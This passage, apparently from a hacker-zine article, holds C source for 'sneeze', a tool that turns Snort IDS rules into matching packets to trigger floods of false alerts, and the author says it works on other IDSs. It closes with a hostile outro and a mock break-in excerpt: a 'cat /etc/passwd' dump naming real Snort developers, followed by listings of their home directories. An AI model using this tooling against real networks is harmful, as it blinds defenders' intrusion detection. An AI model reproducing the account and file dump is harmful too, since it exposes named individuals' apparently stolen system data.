		while (isspace (*begin_data))
			begin_data++;

		if (*begin_data == '"')
			begin_data++;

		end_data = begin_data;

		if (*(begin_data - 1) == '"')
		{

			/* stop at the first quote that is not escaped with a backslash */
			while (*end_data && !((*end_data == '"') &&
			      (*(end_data - 1) != '\\')))
				end_data++;
	
			if (!*end_data)
				REJECT_RULE

		}

		if (*end_data == '"')
			*end_data++ = 0;

		end_data = strchr (end_data, ';');

		if (end_data == NULL)
			REJECT_RULE

		*end_data++ = 0;

		/* handle known keywords */

		/* we can only handle a small subset of datasize
		   keywords... don't worry about ranges, only worry
		   about the '>' operator, which will usually only be
		   used to detect overflow attempts */
		if (!strcasecmp (ptr, "dsize"))
		{
			unsigned int gt = 0;

			while (isspace (*begin_data))
				begin_data++;

			/* make sure its an exact number or gt */
			if (!isdigit (*begin_data) && (*begin_data != '>'))
				REJECT_RULE

			/* Exceed '>' directive by x bytes */
			#define GT_INC		16

			if (*begin_data == '>')
			{
				gt = 1;
				begin_data++;
			}

			rule->dsize = atoi (begin_data);

			if (!rule->dsize)
				REJECT_RULE

			if (gt)
				rule->dsize += GT_INC;


		}
		/* msg holds the rule description */
		else if (!strcasecmp (ptr, "msg"))
		{
			rule->description = strdup (begin_data);

			if (rule->description == NULL)
				REJECT_RULE

		}
		else if (!strcasecmp (ptr, "content"))
		{
			/* we can't handle inverted content matches */
			if (*begin_data == '!')
				REJECT_RULE

			sdata = malloc (sizeof (struct snort_data));

			if (sdata == NULL)
				REJECT_RULE

			memset (sdata, 0, sizeof (struct snort_data));

			if (last_data == NULL)
			{
				rule->sdata = sdata;
				last_data = sdata;
			}
			else
			{
				last_data->next = sdata;
				last_data = sdata;
			}

			sdata->attack_data = parse_content_string (begin_data,
				&(sdata->attack_len));

			if (sdata->attack_data == NULL)
				REJECT_RULE

		}
		/*
		 * only handle a very special case of flags....
		 * basically anything that doesnt have to do with the ACK flag
		 * will be filtered out, because we can't handle raw scans...
		 * I don't know why flags:A+ is sometimes specified but it is...
		 */
		else if (!strcasecmp (ptr, "flags"))
		{
			char *fptr;

			fptr = begin_data;

			while (isspace (*fptr))
				fptr++;

			if (strncmp (fptr, "A+", 2))
				REJECT_RULE

		}
		else if (!strcasecmp (ptr, "offset"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->offset = atoi (begin_data);
		}
		else if (!strcasecmp (ptr, "distance"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->distance = atoi (begin_data);
		}
		else if (!strcasecmp (ptr, "within"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->within = atoi (begin_data);
		}

		ptr = end_data;
	}


done_parsing:
	if (rejected)
	{
		struct snort_data *dptr = rule->sdata;
		/* destroy the rule information */

		while (dptr != NULL)
		{
			struct snort_data *cur;

			cur = dptr;
			dptr = dptr->next;

			if (cur->attack_data != NULL)
				free (cur->attack_data);

			free (cur);
		}

		free (rule->description);
		free (rule);
		return 1;
	}

	return 0;
}


/* comma-delimited list of port numbers from the command line */

int *
read_port_list (char *ports)
{
	char *ptr = ports;
	int *portlist = NULL, num;
	unsigned int nitems = 0;

	while (ptr != NULL && *ptr)
	{
		ptr = strchr (ports, ',');

		if (ptr != NULL)
			*ptr++ = 0;

		num = atoi (ports);

		if (!num)
			return NULL;

		ports = ptr;
		nitems++;

		portlist = xrealloc (portlist, (sizeof (int) * (nitems + 1)));
		portlist[nitems - 1] = num;
		portlist[nitems] = 0;
	}

	return portlist;
}


/* target a random rule that can be aimed at one of availports
   (dstport 0 means "any"; main() aims those at an open port) */

static int
rule_is_usable (struct snort_rule *r, int *availports)
{
	int *pptr;

	if (r->dstport == 0)
		return 1;

	for (pptr = availports; *pptr; pptr++)
		if (r->dstport == *pptr)
			return 1;

	return 0;
}

struct snort_rule *
select_random_rule (int *availports)
{
	struct snort_rule *r;
	unsigned int candidates = 0, pick, i = 0;

	for (r = ruleslist; r != NULL; r = r->next)
		if (rule_is_usable (r, availports))
			candidates++;

	/* nothing usable: report it rather than spinning forever */
	if (!candidates)
		return NULL;

	pick = random_number (0, candidates - 1);

	for (r = ruleslist; r != NULL; r = r->next)
	{
		if (!rule_is_usable (r, availports))
			continue;

		if (i++ == pick)
			return r;
	}

	return NULL;
}


/* verbose logging */

void
debug_printf (char *fmt, ...)
{
#ifdef XDEBUG
	va_list ap;
	char outbuf[1024];

	memset (outbuf, 0, sizeof (outbuf));
	va_start (ap, fmt);
	vsnprintf (outbuf, sizeof (outbuf) - 1, fmt, ap);
	fprintf (stderr, "%s", outbuf);
	va_end (ap);
#endif

	return;
}


/* convert a string to a port number */

unsigned short
getsrcport (char *portstr, char *proto)
{
	struct servent *se;
	unsigned short result;

	if (portstr == NULL)
		return 0;

	result = atoi (portstr);

	if (result)
		return result;

	if ((se = getservbyname (portstr, proto)) == NULL)
		return 0;

	result = ntohs (se->s_port);
	return result;
}


#define ABORT_PARSE		{ free (databuf); return NULL; }

/* parse content line...
   return the buffer and store its length in sizeptr */

void *
parse_content_string (char *line, unsigned int *sizeptr)
{
	char *ptr, *databuf = NULL;
	char *ptr2, *ptr3;

	*sizeptr = 0;
	ptr = ptr2 = line;

	while (*ptr)
	{

		/* backslash escapes the next character (e.g. \| or \"), and the
		   backslash itself is not part of the content */

		if ((*ptr == '\\') && *(ptr + 1))
		{
			ptr++;
			(*sizeptr)++;
			databuf = xrealloc (databuf, *sizeptr);
			databuf[*sizeptr - 1] = *ptr++;
		}
		/* regular character */
		else if (*ptr != '|')
		{
			(*sizeptr)++;
			databuf = xrealloc (databuf, *sizeptr);
			databuf[*sizeptr - 1] = *ptr;
			ptr++;
		}
		else
		{
			char numbuf[16];
			unsigned char byte;
			unsigned short word;
			unsigned long dword, dlen;

			/* deal with raw data in hex format */
			ptr++;

			while (*ptr)
			{
				unsigned char saved_char;

				while (isspace (*ptr))
					ptr++;

				/* reached end of raw hex */
				if (*ptr == '|')
				{
					ptr++;
					goto outer_loop;
				}

				for (ptr3 = ptr; (*ptr3 && (*ptr3 != '|') && (!isspace (*ptr3))); ptr3++)
					;

				saved_char = *ptr3;

				if (!saved_char)
					ABORT_PARSE

				*ptr3++ = 0;
				memset (numbuf, 0, sizeof (numbuf));
				strncpy (numbuf, ptr, sizeof (numbuf) - 1);
				ptr = ptr3;

				/* determine whether we are reading a
				* hex byte, word, or double word */

				if (strlen (numbuf) <= 2)
				{
					dlen = 1;
					byte = strtoul (numbuf, NULL, 16);
				}
				else if (strlen (numbuf) <= 4)
				{
					dlen = 2;
					word = htons ((unsigned short) strtoul (numbuf, NULL, 16));
				}
				else if (strlen (numbuf) <= 8)
				{
					dlen = 4;
					dword = htonl (strtoul (numbuf, NULL, 16));
				}
				else
					/* can't handle this yet */
					ABORT_PARSE	

				*sizeptr += dlen;
				databuf = xrealloc (databuf, *sizeptr);

				if (dlen == 1)
					databuf[*sizeptr - 1] = byte;
				else if (dlen == 2)
					memcpy (&databuf[*sizeptr - 2], &word, 2);
				else if (dlen == 4)
					memcpy (&databuf[*sizeptr - 4], &dword, 4);

				if (saved_char == '|')
					goto outer_loop;

                                }

outer_loop:
                        }

                }

	ptr = ptr2;

        if (!*sizeptr)
		ABORT_PARSE

	return databuf;
}


void
dump_snort_data (struct snort_data *data)
{
#ifdef XDEBUG
	struct snort_data *ptr;

	for (ptr = data; ptr != NULL; ptr = ptr->next)
	{
		unsigned int i;

		fprintf (stderr, "     offset = %d, distance = %d, within = %d, "
			 "case-sensitive = %d, len = %d, [",
			ptr->offset, ptr->distance, ptr->within,
			ptr->case_insensitive, ptr->attack_len);

		for (i = 0; i < ptr->attack_len; i++)
		{

			if (isprint (ptr->attack_data[i]))
				fprintf (stderr, "%c", ptr->attack_data[i]);
			else
				fprintf (stderr, "\\x%.2x",
					(unsigned char) ptr->attack_data[i]);

		}

		fprintf (stderr, "]\n");
	}
#endif

	return;
}


/* Mix the case of a case-insensitive string */

void
mix_case (char *ptr, unsigned int len)
{
	unsigned int i;

	for (i = 0; i < len; i++)
	{

		if (!isalpha (ptr[i]))
			continue;

		if ((rand ()) % 2)
			ptr[i] = tolower (ptr[i]);
		else
			ptr[i] = toupper (ptr[i]);

	}

	return;
}


/* using a snort rule framework, create a packet using polymorphism */

void *
create_data_packet (struct snort_rule *rule, unsigned int *sizeptr)
{
	struct snort_data *sptr;
	char *buf = NULL, *ptr;
	unsigned int buflen = 0;

	for (sptr = rule->sdata; sptr != NULL; sptr = sptr->next)
	{
		unsigned int inclen, oldlen, pos;

		pos = oldlen = buflen;
		buflen = XMAX(buflen, sptr->offset);

		buf = xrealloc (buf, buflen);
		ptr = buf;
		ptr += oldlen;
		fill_random_data (ptr, (buflen - oldlen));

		if (sptr->offset)
		{
			ptr = buf + sptr->offset;
			pos = sptr->offset;
		}
		else
		{
			unsigned int d, w, padbytes;

			d = sptr->distance;
			w = sptr->within;

			if (d && !w)
				w = d;

			/* this should never happen */
			if (d > w)
				d = w;
	
			oldlen = buflen;
			padbytes = random_number (d, w);
			inclen = buflen + padbytes;

			buf = xrealloc (buf, inclen);
			/* keep buflen in step with the buffer; otherwise the
			 * realloc below shrinks it and the memcpy overruns by
			 * padbytes */
			buflen = inclen;
			ptr = buf + oldlen;
			fill_random_data (ptr, padbytes);
			ptr += padbytes;
			pos += padbytes;
		}

		/* finally, fill in our data */
		buflen += sptr->attack_len;

		buf = xrealloc (buf, buflen);
		ptr = buf + pos;
		memcpy (ptr, sptr->attack_data, sptr->attack_len);

		if (sptr->case_insensitive)
			mix_case (ptr, sptr->attack_len);
	}

	/* finally, extend the buffer if dsize is specified */
	if (rule->dsize && (buflen != rule->dsize))
	{
		unsigned int oldblen = buflen;

		buflen = rule->dsize;
		buf = xrealloc (buf, buflen);
		ptr = buf;
		ptr += oldblen;
		fill_random_data (ptr, (buflen - oldblen));
	}

	*sizeptr = buflen;
	return buf;
}


/* fill buf with random data */

void
fill_random_data (char *buf, unsigned int len)
{
	unsigned int i;

	for (i = 0; i < len; i++)
	{
		/* let's not make it completely random */
		unsigned char randbyte = 0;

		while (!(isalnum (randbyte)))
			randbyte = (rand() & 0xff);

		buf[i] = (char) randbyte;

	}

	return;
}


/* generate random number between lo and hi */

int
random_number (int lo, int hi)
{
	int result;

	result = rand ();
	result %= ((hi - lo) + 1);
	result += lo;
	return result;
}


/* some implementations don't allow reallocs with 0 */

void *
xrealloc (void *ptr, size_t size)
{
	void *result;

	if (!size)
		size = 4;

	result = realloc (ptr, size);

	if (result == NULL)
	{
		perror ("realloc");
		exit (EXIT_FAILURE);
	}

	return result;
}

 


--[ 4. Outro

  "I haven't been with a woman in nine months." 
  - Mike Tyson

Fuck Snort. Oh, and these techniques should of course be applicable to a
variety of other IDSs, all of which probably have rule lists imported from
snort.


4.1 Self-Promotion

You can expect a user's manual for my sneeze tool to appear as its own
separate article sometime in the near future. In addition, I would like to
notify you of my new and upcoming book, Hacker's Challenge Part III. Like
the past two books in this series, I discuss real life forensic and hacking
investigation conundrums and their solutions. These puzzles will get your
axons firing and stimulate your frontal cortex more than any other security
book you've ever seen. "What does this have to do with this article?",
you may inquisitively ask. Well, you may recall from above some of the
poorly written snort rules. Attached is a small excerpt from Hacker's
Challenge III. Match your wits against the attackers as you try to figure
out how they "owned" this box. Would this break-in incident have occurred
if the administrators had written more rigorous snort rules?

cd /home;
cat /etc/passwd;
root:*:0:0:Charlie &:/root:/usr/local/bin/tcsh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
uucp:*:66:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
www:*:67:67:HTTP server:/var/www:/sbin/nologin
named:*:70:70:BIND Name Service Daemon:/var/named:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
roesch:*:1000:1000:Martin Roesch:/home/roesch:/usr/local/bin/tcsh
jpavlick:*:1001:1001:John Pavlick:/home/jpavlick:/usr/local/bin/tcsh
dr:*:1002:1002:Dragos Ruiu:/home/dr:/usr/local/bin/tcsh
mikef:*:1003:1003:Mike Forostiak:/home/mikef:/usr/local/bin/tcsh
tburgess:*:1004:1004:Tom Burgess:/home/tburgess:/usr/local/bin/tcsh
bmc:*:1005:1005:Brian Caswell:/home/bmc:/usr/local/bin/tcsh
phil:*:1006:1006:Phil Cataldi:/home/phil:/usr/local/bin/tcsh
jed:*:1007:1007:Jed Haile:/home/jed:/usr/local/bin/tcsh
andrewb:*:1008:1008:Andrew Baker:/home/andrewb:/usr/local/bin/tcsh
sfuser1:*:1009:1009:remote user:/home/sfuser1:/bin/sh
jasonl:*:1010:1010:Jason Larsen:/home/jasonl:/usr/local/bin/tcsh
cmg:*:1011:1011:Chris Green:/home/cmg:/usr/local/bin/tcsh
sschwing:*:1012:1012:Steve Schwinger:/home/sschwing:/usr/local/bin/tcsh
ls -al *;
andrewb:
total 1116
drwxr-xr-x   6 andrewb  andrewb     512 --- -- ---- .
drwxr-xr-x  15 root     wheel       512 --- -- ---- ..
drwx------   3 andrewb  andrewb     512 --- -- ---- .BitchX
-rw-r--r--   1 andrewb  andrewb     769 --- -- ---- .cshrc
-rw-------   1 andrewb  andrewb    2807 --- -- ---- .history
-rw-r--r--   1 andrewb  andrewb     318 --- -- ---- .login
-rw-r--r--   1 andrewb  andrewb     105 --- -- ---- .mailrc
-rw-r--r--   1 andrewb  andrewb     201 --- -- ---- .profile
-rw-------   1 andrewb  andrewb     128 --- -- ---- .rhosts
drwx------   2 andrewb  andrewb     512 --- -- ---- .ssh
-rw-r--r--   1 andrewb  andrewb     216 --- -- ---- .vimrc
-rw-r--r--   1 andrewb  andrewb  134007 --- -- ---- barnyard-0.1.0-beta3.tar.gz
-rw-r--r--   1 andrewb  andrewb  156397 --- -- ---- barnyard-0.1.0-beta4.tar.gz
-rw-r--r--   1 andrewb  andrewb  147971 --- -- ---- barnyard-sf.tgz
-rw-r--r--   1 andrewb  andrewb   64551 --- -- ---- parser.tgz
-rw-r--r--   1 andrewb  andrewb    6630 --- -- ---- solaris.diff
drwxr-xr-x   3 andrewb  andrewb     512 --- -- ---- src
drwxr-xr-x   2 andrewb  andrewb     512 --- -- ---- src.old

bmc:
total 1143996
-rw-r--r--   1 bmc   bmc      5102865 --- -- ---- (X-Ecutioners) It's Going Down.mp3
drwxr-xr-x  18 bmc   bmc         3072 --- -- ---- .
drwxr-xr-x  15 root  wheel        512 --- -- ---- ..
drwx------   3 bmc   bmc          512 --- -- ---- .BitchX
-rw-r--r--   1 bmc   bmc           88 --- -- ---- .bitchxc
-rw-r--r--   1 bmc   bmc          126 --- -- ---- .bitchxrc
-rw-r--r--   1 bmc   bmc          769 --- -- ---- .cshrc
-rw-r--r--   1 bmc   bmc          126 --- -- ---- .epic4rc
-rw-r--r--   1 bmc   bmc          126 --- -- ---- .epicrc
-rw-------   1 bmc   bmc         2180 --- -- ---- .history
-rw-------   1 bmc   bmc           40 --- -- ---- .ircrc
-rw-r--r--   1 bmc   bmc          318 --- -- ---- .login
-rw-------   1 bmc   bmc          104 --- -- ---- .lynx_cookies
-rw-r--r--   1 bmc   bmc          105 --- -- ---- .mailrc
-rw-r--r--   1 bmc   bmc          123 --- -- ---- .muttrc
-rw-r--r--   1 bmc   bmc          201 --- -- ---- .profile
-rw-------   1 bmc   bmc          128 --- -- ---- .rhosts
-rw-r--r--   1 bmc   bmc           84 --- -- ---- .screenrc
drwx------   2 bmc   bmc          512 --- -- ---- .ssh
-rw-r--r--   1 bmc   bmc      1009016 --- -- ---- 06-02-2002.tgz
-rw-------   1 bmc   bmc         8862 --- -- ---- 100Mb_tapping1.pdf
-rw-------   1 bmc   bmc         9117 --- -- ---- 100Mb_tapping2.pdf
-rw-r--r--   1 bmc   bmc      1617800 --- -- ---- 2002-06-24-b.zip
-rw-r--r--   1 bmc   bmc       888503 --- -- ---- 2002-06-24.zip
-rw-r--r--   1 bmc   bmc        90063 --- -- ---- 7350php.tgz
-rw-------   1 bmc   bmc      1667444 --- -- ---- BitchX-1.0c17.core
-rw-r--r--   1 bmc   bmc       287866 --- -- ---- IDSk9-sig-3.0-3-S15.bin
-rw-r--r--   1 bmc   bmc         7603 --- -- ---- IDSk9-sig-3.0-3-S15.readme
drwx------   2 bmc   bmc          512 --- -- ---- Mail
-rw-r--r--   1 bmc   bmc       245808 --- -- ---- NetRecon-CVE-200.xls
drwxr-xr-x   4 bmc   bmc          512 --- -- ---- SENSIG30
-rw-r--r--   1 bmc   bmc       207539 --- -- ---- SENSIG30.tar.Z
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- WWW
drwxr-xr-x   4 bmc   bmc          512 --- -- ---- advice.networkice.com
-rw-r--r--   1 bmc   bmc      2452743 --- -- ---- arin.20020501
-rw-r--r--   1 bmc   bmc       985426 --- -- ---- autox.tgz
-rw-------   1 bmc   bmc         2741 --- -- ---- barnyard.server.gz
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- bin
-rw-r--r--   1 bmc   bmc       285975 --- -- ---- blah.bin
-rw-r--r--   1 bmc   bmc         9277 --- -- ---- byebye-small.jpg
-rw-r--r--   1 bmc   bmc          858 --- -- ---- crashme.cap
-rw-r--r--   1 bmc   bmc    121431654 --- -- ---- csv14full.exe
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- cvsroot
-rwxr-xr-x   1 bmc   bmc          846 --- -- ---- dhcpclient
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- docs
drwxr-xr-x   5 bmc   bmc         6144 --- -- ---- ethereal-0.9.3
-rw-r--r--   1 bmc   bmc      2961451 --- -- ---- ethereal-0.9.3.tar.gz
drwxr-xr-x   4 bmc   bmc          512 --- -- ---- exploits
-rw-r--r--   1 bmc   bmc        12385 --- -- ---- face-sm.jpg
-rw-r--r--   1 bmc   bmc        11452 --- -- ---- face_2-sm.jpg
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- gzsig-0.1
-rw-r--r--   1 bmc   bmc        35494 --- -- ---- gzsig-0.1.tar.gz
-rw-r--r--   1 bmc   bmc        10670 --- -- ---- head.jpg
-rw-r--r--   1 bmc   bmc     80921107 --- -- ---- hl1109.exe
-rwxr-xr-x   1 bmc   bmc         1967 --- -- ---- honeysuckle
-rw-r--r--   1 bmc   bmc         2891 --- -- ---- inout-1.0-tar.gz
-rw-r--r--   1 bmc   bmc         1000 --- -- ---- ip360
-rw-r--r--   1 bmc   bmc       846336 --- -- ---- iss HigkRiskCVEs.xls
-rw-r--r--   1 bmc   bmc       682927 --- -- ---- iss.csv
-rw-r--r--   1 bmc   bmc         3925 --- -- ---- logo.gif
-rw-------   1 bmc   bmc          735 --- -- ---- mbox
-rw-------   1 bmc   bmc       628680 --- -- ---- mbox.gz
-rw-------   1 bmc   bmc      1169120 --- -- ---- mbox2.gz
-rw-r--r--   1 bmc   bmc        18385 --- -- ---- miche-small.jpg
drwxr-xr-x   3 bmc   bmc         1536 --- -- ---- mp3
-rw-r--r--   1 bmc   bmc       316092 --- -- ---- msr.tar.gz
-r-xr-xr-x   1 bmc   bmc       442368 --- -- ---- mutt
drwxr-xr-x   2 bmc   bmc          512 --- -- ---- packets
-rw-r--r--   1 bmc   bmc        33263 --- -- ---- polo.jpg
-rw-------   1 bmc   bmc          540 --- -- ---- postponed
-rw-r--r--   1 bmc   bmc         9946 --- -- ---- profile.JPG
-rw-r--r--   1 bmc   bmc        13629 --- -- ---- profile_2-sm.jpg
-rw-r--r--   1 bmc   bmc        56230 --- -- ---- quals.csv
-rw-r--r--   1 bmc   bmc     55237030 --- -- ---- referer
-rw-r--r--   1 bmc   bmc        18329 --- -- ---- renfest-small.jpg
-rw-r--r--   1 bmc   bmc         1298 --- -- ---- segfault_ca.pem
-rw-------   1 bmc   bmc       114176 --- -- ---- sev_export_cve.xls
-rwxr-xr-x   1 bmc   bmc         2861 --- -- ---- sforce_ai
-rw-r--r--   1 bmc   bmc         9033 --- -- ---- silc-client-0.8.6.diff
-rw-------   1 bmc   bmc      2000297 --- -- ---- silidef
-rw-r--r--   1 bmc   bmc         1960 --- -- ---- smo.ksh
-rw-r--r--   1 bmc   bmc        40960 --- -- ---- sneeze-1.0.tar
drwxr-xr-x   3 bmc   bmc          512 --- -- ---- snort
-rw-r--r--   1 bmc   bmc       199418 --- -- ---- snort-1.8.5-openbsd-3.0.pkg.tgz
-rw-r--r--   1 bmc   bmc       720692 --- -- ---- snort-1.8.5-solaris-2.8.pkg.gz
-rw-r--r--   1 bmc   bmc     10370832 --- -- ---- snort-cvsroot.tar.gz
-rw-r--r--   1 bmc   bmc     10380309 --- -- ---- snort-cvsroot.tar.gz.1
-rw-r--r--   1 bmc   bmc     11875917 --- -- ---- snort-cvsroot.tar.gz.10
-rw-r--r--   1 bmc   bmc     11929136 --- -- ---- snort-cvsroot.tar.gz.11
-rw-r--r--   1 bmc   bmc     12069901 --- -- ---- snort-cvsroot.tar.gz.12
-rw-r--r--   1 bmc   bmc     12109819 --- -- ---- snort-cvsroot.tar.gz.13
-rw-r--r--   1 bmc   bmc     12293670 --- -- ---- snort-cvsroot.tar.gz.14
-rw-r--r--   1 bmc   bmc     12308852 --- -- ---- snort-cvsroot.tar.gz.15
-rw-r--r--   1 bmc   bmc     12361860 --- -- ---- snort-cvsroot.tar.gz.16
-rw-r--r--   1 bmc   bmc     12465104 --- -- ---- snort-cvsroot.tar.gz.17
-rw-r--r--   1 bmc   bmc     12471095 --- -- ---- snort-cvsroot.tar.gz.18
-rw-r--r--   1 bmc   bmc     12481160 --- -- ---- snort-cvsroot.tar.gz.19
-rw-r--r--   1 bmc   bmc     10433614 --- -- ---- snort-cvsroot.tar.gz.2
-rw-r--r--   1 bmc   bmc     12569554 --- -- ---- snort-cvsroot.tar.gz.20
-rw-r--r--   1 bmc   bmc     10508638 --- -- ---- snort-cvsroot.tar.gz.3
-rw-r--r--   1 bmc   bmc     10896512 --- -- ---- snort-cvsroot.tar.gz.4
-rw-r--r--   1 bmc   bmc     11313018 --- -- ---- snort-cvsroot.tar.gz.5
-rw-r--r--   1 bmc   bmc     11353208 --- -- ---- snort-cvsroot.tar.gz.6
-rw-r--r--   1 bmc   bmc     11397599 --- -- ---- snort-cvsroot.tar.gz.7
-rw-r--r--   1 bmc   bmc     11620457 --- -- ---- snort-cvsroot.tar.gz.8
-rw-r--r--   1 bmc   bmc     11829229 --- -- ---- snort-cvsroot.tar.gz.9
-rw-------   1 bmc   bmc         2846 --- -- ---- snort.server.gz
-rw-------   1 bmc   bmc      1442726 --- -- ---- snort_log
-rwxr-xr-x   1 bmc   bmc       334287 --- -- ---- stunnel
-rw-r--r--   1 bmc   bmc          919 --- -- ---- submit
-rw-------   1 bmc   bmc      2073290 --- -- ---- teso
-rw-r--r--   1 bmc   bmc        10197 --- -- ---- thumb1-sm.jpg
-rw-r--r--   1 bmc   bmc     53106716 --- -- ---- uniq
-rw-r--r--   1 bmc   bmc          614 --- -- ---- urls
-rw-r--r--   1 bmc   bmc         9690 --- -- ---- wireless-scanner.png
drwxr-x---   4 bmc   bmc          512 --- -- ---- x2src
-rw-r--r--   1 bmc   bmc        27369 --- -- ---- x2src.tgz

cmg:
total 47754
drwxr-xr-x  15 cmg   cmg        1024 --- -- ---- .
drwxr-xr-x  15 root  wheel       512 --- -- ---- ..
-rw-r--r--   1 cmg   cmg         843 --- -- ---- .cshrc
-rw-------   1 cmg   cmg        2538 --- -- ---- .history
drwxr-xr-x   9 cmg   cmg        1024 --- -- ---- .irc
-rw-r--r--   1 cmg   cmg         247 --- -- ---- .ircrc
-rw-r--r--   1 cmg   cmg          71 --- -- ---- .lice_updates.txt
-rw-r--r--   1 cmg   cmg         318 --- -- ---- .login
-rw-r--r--   1 cmg   cmg         105 --- -- ---- .mailrc
-rw-r--r--   1 cmg   cmg         201 --- -- ---- .profile
-rw-------   1 cmg   cmg         128 --- -- ---- .rhosts
-rw-r--r--   1 cmg   cmg        3396 --- -- ---- .screenrc
drwx------   2 cmg   cmg         512 --- -- ---- .ssh
-rw-r--r--   1 cmg   cmg     1408922 --- -- ---- 42.zip
-rw-------   1 cmg   cmg      318008 --- -- ---- IRCLOG.#antisnort
-rw-------   1 cmg   cmg       28173 --- -- ---- IRCLOG.#snortschemas
-rw-r--r--   1 cmg   cmg       12360 --- -- ---- MAKEDEV
-rw-r--r--   1 cmg   cmg     1594880 --- -- ---- Snort185Win32.exe
-rw-r--r--   1 cmg   cmg       30370 --- -- ---- bdb-eval.tar.gz
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- bin
drwxr-xr-x   7 cmg   cmg         512 --- -- ---- build
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- cdrom
-rw-r--r--   1 cmg   cmg    14426372 --- -- ---- cvsroot.tar.gz
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- downloads
-rw-r--r--   1 cmg   cmg      662234 --- -- ---- epic.tar.gz
drwxr-xr-x   9 cmg   cmg        1024 --- -- ---- epic4-1.1.5
-rw-r--r--   1 cmg   cmg         614 --- -- ---- id_dsa.pub
-rw-r--r--   1 cmg   cmg      206962 --- -- ---- irc.tar.gz
-rw-r--r--   1 cmg   cmg      208906 --- -- ---- irc.tgz
-rw-r--r--   1 cmg   cmg        6040 --- -- ---- named.tgz
-rw-r--r--   1 cmg   cmg       12017 --- -- ---- pm.rc
-rw-r--r--   1 cmg   cmg     1726082 --- -- ---- snort-1.8.7.tar.gz
drwxr-xr-x   9 cmg   cmg        1024 --- -- ---- snort-1.9
-r--r--r--   1 cmg   cmg     1794602 --- -- ---- snort-20020129-1stable.src.rpm
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- snort-rpms
drwxr-xr-x   7 cmg   cmg        7680 --- -- ---- snort-stable
-rw-r--r--   1 cmg   cmg     1807323 --- -- ---- snort-stable-snapshot.tar.gz
-rw-r--r--   1 cmg   cmg       47825 --- -- ---- snot-0.92a.tar.gz
drwxr-xr-x   5 cmg   cmg         512 --- -- ---- src
drwxr-xr-x   2 cmg   cmg         512 --- -- ---- tmp
drwxr-xr-x   2 cmg   cmg        1024 --- -- ---- tocerb

dr:
total 417076
drwxr-xr-x   6 dr    dr         3072 --- -- ---- .
drwxr-xr-x  15 root  wheel       512 --- -- ---- ..
-rw-r--r--   1 dr    dr          769 --- -- ---- .cshrc
-rw-------   1 dr    dr         1829 --- -- ---- .history
-rw-r--r--   1 dr    dr          318 --- -- ---- .login
-rw-r--r--   1 dr    dr          105 --- -- ---- .mailrc
-rw-r--r--   1 dr    dr          201 --- -- ---- .profile
-rw-------   1 dr    dr          128 --- -- ---- .rhosts
drwx------   2 dr    dr          512 --- -- ---- .ssh
-rw-r--r--   1 dr    dr         1022 --- -- ---- 10.1.1.35
-rw-r--r--   1 dr    dr          216 --- -- ---- Alerts.php
-rw-r--r--   1 dr    dr         8276 --- -- ---- AlertsData.php
-rw-r--r--   1 dr    dr          801 --- -- ---- AlertsGraphs.php
-rw-r--r--   1 dr    dr         7784 --- -- ---- AlertsIncident.php
-rw-r--r--   1 dr    dr         7893 --- -- ---- AlertsQuery.php
-rw-r--r--   1 dr    dr         7633 --- -- ---- AlertsRecent.php
-rw-r--r--   1 dr    dr         5316 --- -- ---- AlertsReports.php
-rw-r--r--   1 dr    dr         6996 --- -- ---- AlertsStats.php
-rw-r--r--   1 dr    dr         2052 --- -- ---- Browse-or.jpg
-rw-r--r--   1 dr    dr         2100 --- -- ---- Browse-y.jpg
-rw-r--r--   1 dr    dr         2070 --- -- ---- Browse-yp.jpg
-rw-r--r--   1 dr    dr          224 --- -- ---- Config.php
-rw-r--r--   1 dr    dr        20731 --- -- ---- ConfigNet.php
-rw-r--r--   1 dr    dr        13932 --- -- ---- ConfigSnort.php
-rw-r--r--   1 dr    dr         8482 --- -- ---- ConfigUsers.php
-rw-r--r--   1 dr    dr          229 --- -- ---- Help.php
-rw-r--r--   1 dr    dr         1470 --- -- ---- Login.php
-rw-r--r--   1 dr    dr          250 --- -- ---- Logout.php
-rw-r--r--   1 dr    dr         2102 --- -- ---- Reports-or.jpg
-rw-r--r--   1 dr    dr         2179 --- -- ---- Reports-y.jpg
-rw-r--r--   1 dr    dr         2328 --- -- ---- Reports-yp.jpg
-rw-r--r--   1 dr    dr        18510 --- -- ---- Rules.php
-rw-r--r--   1 dr    dr        10088 --- -- ---- RulesActive.php
-rw-r--r--   1 dr    dr        33149 --- -- ---- RulesBrowse.php
-rw-r--r--   1 dr    dr        30918 --- -- ---- RulesEdit.php
-rw-r--r--   1 dr    dr        11513 --- -- ---- RulesFiles.php
-rw-r--r--   1 dr    dr         2165 --- -- ---- RulesImport.php
-rw-r--r--   1 dr    dr         9882 --- -- ---- RulesInactive.php
-rw-r--r--   1 dr    dr        31789 --- -- ---- RulesNew.php
-rw-r--r--   1 dr    dr        22506 --- -- ---- RulesSearch.php
-rw-r--r--   1 dr    dr        23103 --- -- ---- RulesType.php
-rw-r--r--   1 dr    dr         7594 --- -- ---- RulesVars.php
-rw-r--r--   1 dr    dr          209 --- -- ---- Sensor.php
-rw-r--r--   1 dr    dr         2721 --- -- ---- SensorDisk.php
-rw-r--r--   1 dr    dr         1821 --- -- ---- SensorProcess.php
-rw-r--r--   1 dr    dr          804 --- -- ---- SensorSnort.php
-rw-r--r--   1 dr    dr         1022 --- -- ---- SensorSyslog.php
-rw-r--r--   1 dr    dr      1607168 --- -- ---- Snort Win32.exe
-rw-r--r--   1 dr    dr      1570304 --- -- ---- Snort Win32.msi
-rw-r--r--   1 dr    dr      1298944 --- -- ---- Snort-182.exe
-rw-r--r--   1 dr    dr      1526784 --- -- ---- Snort183Win32.exe
